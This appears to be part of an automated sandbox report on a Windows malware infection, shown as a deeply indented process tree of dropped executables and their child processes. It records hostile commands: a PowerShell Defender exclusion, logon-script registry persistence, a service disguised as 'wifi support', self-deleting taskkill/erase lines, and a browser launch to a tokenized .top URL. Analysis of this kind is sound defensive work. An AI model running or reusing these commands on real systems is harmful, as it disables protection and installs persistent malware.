                                                                                                                                                                                                                    • C:\Users\Admin\Documents\CFCEB9qVT6cxx8v3IXqRyl8N.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Documents\CFCEB9qVT6cxx8v3IXqRyl8N.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:7260
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "CFCEB9qVT6cxx8v3IXqRyl8N.exe" /f & erase "C:\Users\Admin\Documents\CFCEB9qVT6cxx8v3IXqRyl8N.exe" & exit
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:5484
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                              taskkill /im "CFCEB9qVT6cxx8v3IXqRyl8N.exe" /f
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                              PID:8328
                                                                                                                                                                                                                        • C:\Users\Admin\Documents\9WCj2sodanvV947dVcRY8UCW.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Documents\9WCj2sodanvV947dVcRY8UCW.exe"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:7252
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\PHRQXpJYN7E91NjvPwSLVOdC.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\PHRQXpJYN7E91NjvPwSLVOdC.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:7552
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\PHRQXP~1.DLL,s C:\Users\Admin\DOCUME~1\PHRQXP~1.EXE
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                  PID:4536
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                                                    C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\PHRQXP~1.DLL,kDZa
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:9924
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\PHRQXP~1.DLL
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                          PID:5076
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\vq7LSndsUCKj_pQNQ9lykC7b.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\vq7LSndsUCKj_pQNQ9lykC7b.exe"
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:5536
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-61C9H.tmp\vq7LSndsUCKj_pQNQ9lykC7b.tmp
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-61C9H.tmp\vq7LSndsUCKj_pQNQ9lykC7b.tmp" /SL5="$4038E,138429,56832,C:\Users\Admin\Documents\vq7LSndsUCKj_pQNQ9lykC7b.exe"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:7596
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-PI6UI.tmp\Setup.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-PI6UI.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                              PID:8680
                                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                  PID:8272
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579443 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:5220
                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            PID:6112
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7466138.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7466138.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:6720
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1037195.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1037195.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:6664
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5887823.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5887823.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:6812
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5722255.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5722255.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:6944
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\2407315.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\2407315.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:8
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:5760
                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\vl8ieEveenrrk0ATyyXk_6d6.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\vl8ieEveenrrk0ATyyXk_6d6.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                PID:1112
                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\uirJhyYUCrI_qlr8NOzHWiKx.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\uirJhyYUCrI_qlr8NOzHWiKx.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                PID:2244
                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\j88HxV4UXDWOPXhwPUiI12WW.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\j88HxV4UXDWOPXhwPUiI12WW.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                PID:1564
                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\KEwv8xFLso1JmhjHqpiKMOP4.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\KEwv8xFLso1JmhjHqpiKMOP4.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                PID:1156
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\j88HxV4UXDWOPXhwPUiI12WW.exe
                                                                                                                                                                                                                                              C:\Users\Admin\Documents\j88HxV4UXDWOPXhwPUiI12WW.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:4872
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 24
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                PID:2212
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-8J5FE.tmp\Inlog.tmp
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-8J5FE.tmp\Inlog.tmp" /SL5="$103AE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:5240
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-2MI6F.tmp\Setup.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-2MI6F.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:5316
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-FBMM6.tmp\Setup.tmp
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-FBMM6.tmp\Setup.tmp" /SL5="$50056,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-2MI6F.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:4180
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-KEVMU.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:7108
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                              expand C:\Users\Admin\AppData\Local\Temp\is-KEVMU.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:6416
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:8632
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:804
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-KEVMU.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-KEVMU.tmp\{app}\vdi_compiler"
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:6924
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:856
                                                                                                                                                                                                                                                                    • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                                                                                                                                                      "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:6404
                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                  PID:6276
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:6288
                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:6548
                                                                                                                                                                                                                                                                    • C:\ProgramData\bwqd\rmfhegf.exe
                                                                                                                                                                                                                                                                      C:\ProgramData\bwqd\rmfhegf.exe start
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:6912
                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        PID:5240
                                                                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:6828
                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding F61DAA1E512DE51628E446080941566F C
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:8488
                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding A8D7AE5FC296653C6D891B2996B682A8 C
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:8204
                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding C8E53B8CA2CA0FE4621777ACDD572B43 C
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:8480
                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding F19184CD970017B2971351084D4610ED
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:8792
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:4680
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:9360
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--M3yPGhgtKO"
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:10124
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ffa2c3f9ec0,0x7ffa2c3f9ed0,0x7ffa2c3f9ee0
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:9136
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x150,0x154,0x158,0x12c,0x15c,0x7ff6200d4e60,0x7ff6200d4e70,0x7ff6200d4e80
                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                      PID:10096
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,10504246800227199731,9541855078059083667,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10124_140093925" --mojo-platform-channel-handle=1708 /prefetch:8
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:5536
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1648,10504246800227199731,9541855078059083667,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10124_140093925" --mojo-platform-channel-handle=2256 /prefetch:8
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:1760
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1648,10504246800227199731,9541855078059083667,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10124_140093925" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2580 /prefetch:1
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:7004
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1648,10504246800227199731,9541855078059083667,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10124_140093925" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:8440
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,10504246800227199731,9541855078059083667,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10124_140093925" --mojo-platform-channel-handle=2996 /prefetch:8
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:5064
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1648,10504246800227199731,9541855078059083667,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10124_140093925" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3196 /prefetch:2
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:10228
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,10504246800227199731,9541855078059083667,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10124_140093925" --mojo-platform-channel-handle=1920 /prefetch:8
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:9312
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,10504246800227199731,9541855078059083667,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10124_140093925" --mojo-platform-channel-handle=3392 /prefetch:8
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:9984
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,10504246800227199731,9541855078059083667,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10124_140093925" --mojo-platform-channel-handle=3056 /prefetch:8
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:7652
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_E64E.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:9584
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                PID:208
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:6408
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1664.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1664.exe
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:9080
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1E83.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1E83.exe
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:6604
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5766.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5766.exe
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:2136
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\6707.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\6707.exe
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:8484
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ryvzqvwe\
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:8548
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\txeikndp.exe" C:\Windows\SysWOW64\ryvzqvwe\
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:9276
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" create ryvzqvwe binPath= "C:\Windows\SysWOW64\ryvzqvwe\txeikndp.exe /d\"C:\Users\Admin\AppData\Local\Temp\6707.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:9576
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" description ryvzqvwe "wifi internet conection"
                                                                                                                                                                                                                                                                                                                                  2⤵
